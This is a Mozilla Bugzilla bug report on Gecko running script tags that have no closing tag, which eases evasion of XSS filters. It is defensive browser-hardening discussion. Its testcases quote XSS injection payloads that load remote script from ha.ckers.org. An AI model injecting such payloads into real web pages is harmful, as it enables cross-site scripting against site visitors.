Closed
Bug 376899
Opened 19 years ago
Closed 19 years ago
Closing tag for scripts should be required
Categories
(Core :: DOM: HTML Parser, defect)
Core
DOM: HTML Parser
Tracking
()
RESOLVED
WORKSFORME
People
(Reporter: jwkbugzilla, Assigned: mrbkap)
References
Details
Currently Gecko makes it easier to evade filters and length restrictions in XSS by not requiring a closing tag for scripts:
<SCRIPT SRC=http://ha.ckers.org/.j>
This script will execute even if there is no closing </SCRIPT> for it. Other browsers will not execute this script, Gecko should behave in the same way.
|
Reporter | |
Comment 1•19 years ago
|
||
Note: this is similar to bug 226495 but AFAICT with all example pages gone bug 226495 is about http://ha.ckers.org/xss.html#XSS_No_closing_script_tags and has been fixed by bug 305873. This bug is about http://ha.ckers.org/xss.html#XSS_Protocol_resolution however and is still open in the current trunk nightlies.
|
Assignee | |
Comment 2•19 years ago
|
||
So the actual testcase we care about here is actually:
<SCRIPT src=//ha.ckers.org/.j></SCRIPT>
Right? If the version without the </SCRIPT> is executing on trunk, then there's a bug in my patch for bug 305873 that needs to be fixed. Otherwise, this belongs to networking (I think) to figure out the correct way to deal with the seemingly invalid "//" protocol.
|
|
Reporter | |
Comment 3•19 years ago
|
||
No, URLs starting with // are bug 362259 which seems to be a WONTFIX. Actually, your patch for bug 305873 is doing just fine in the nightlies, not sure why the testcase worked in my own build. Resolving WORKSFORME, sorry about not testing properly.
Status: NEW → RESOLVED
Closed: 19 years ago
Resolution: --- → WORKSFORME
You need to log in
before you can comment on or make changes to this bug.
Description
•